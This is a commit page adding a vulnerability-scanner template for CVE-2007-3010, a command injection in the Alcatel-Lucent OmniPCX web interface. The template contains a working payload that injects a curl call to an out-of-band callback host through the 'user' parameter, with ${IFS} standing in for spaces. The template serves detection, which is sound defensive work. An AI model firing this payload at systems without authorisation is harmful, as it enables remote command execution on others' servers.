Skip to content

Commit f174fb2

Browse files
Create template for CVE-2007-3010
1 parent efccbc1 commit f174fb2

File tree

1 file changed

+28
-0
lines changed

1 file changed

+28
-0
lines changed

http/cves/2007/CVE-2007-3010.yaml

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
id: CVE-2007-3010
2+
3+
info:
4+
name: Alcatel-Lucent OmniPCX - Remote Command Execution
5+
author: king-alexander
6+
severity: high
7+
description: |
8+
The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
9+
impact: |
10+
Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
11+
remediation: |
12+
Update to supported versions that filter shell metacharacters in the "user" parameter.
13+
reference:
14+
- https://nvd.nist.gov/vuln/detail/CVE-2007-3010
15+
- https://marc.info/?l=full-disclosure&m=119002152126755&w=2
16+
tags: alcatel,cve,cve2007,kev,rce
17+
18+
http:
19+
- method: GET
20+
path:
21+
# Spaces must be encoded with the internal field separator "${IFS}" to execute the command.
22+
- "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;curl${IFS}https://{{interactsh-url}};"
23+
24+
matchers:
25+
- type: word
26+
part: interactsh_protocol
27+
words:
28+
- "http"

0 commit comments

Comments
 (0)